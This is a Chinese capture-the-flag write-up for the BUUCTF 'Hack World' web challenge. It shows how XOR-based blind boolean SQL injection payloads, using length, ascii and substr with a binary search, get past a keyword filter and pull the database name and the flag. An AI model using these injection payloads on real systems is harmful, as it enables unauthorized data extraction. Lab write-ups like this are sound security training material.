buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

51 篇文章 4 订阅
17 篇文章 1 订阅

buuctf——[CISCN2019 华北赛区 Day2 Web1]Hack World

1.根据提示,说明flag在表里
在这里插入图片描述

2.那就猜测存在sql注入,反手测试一波id=1'
在这里插入图片描述
3.尝试使用1'--+进行注释
在这里插入图片描述
4.直接丢进salmap里吧,不出意外多半是跑不出来
在这里插入图片描述
5.直接放入fuzz里进行测试
在这里插入图片描述
6.发现当我们使用异或时,出现了提示
Hello, glzjin wants a girlfriend.

在这里插入图片描述
7.那我们就按照这个思路进行注入
异或异或,相同为0,不同为1

在这里插入图片描述
在这里插入图片描述
8.判断数据库的长度

0^(length(database())>0)

在这里插入图片描述

0^(length(database())>16)

在这里插入图片描述
9.使用折半查找的方式进行测试
在这里插入图片描述

0^(length(database())>13)

在这里插入图片描述

0^(length(database())>10)

在这里插入图片描述

0^(length(database())>11)

在这里插入图片描述
10.说明数据库的长度为11

0^(length(database())=11)

在这里插入图片描述
12.判断数据库名

0^(ascii(substr(database(),1,1))>80)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>100)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>90)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>95)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>97)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>98)

在这里插入图片描述

0^(ascii(substr(database(),1,1))>99)

在这里插入图片描述

id=0^(ascii(substr(database(),1,1))=99)

在这里插入图片描述

中间的折磨了好久想爆破数据库的表名,走啦好多的弯路,可以直接出来的

0^(ascii(substr((select(flag)from(flag)),{},1))>{})

在这里插入图片描述

flag{bcc3af9d-a5ee-4395-a540-ffb516eaba15}

在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值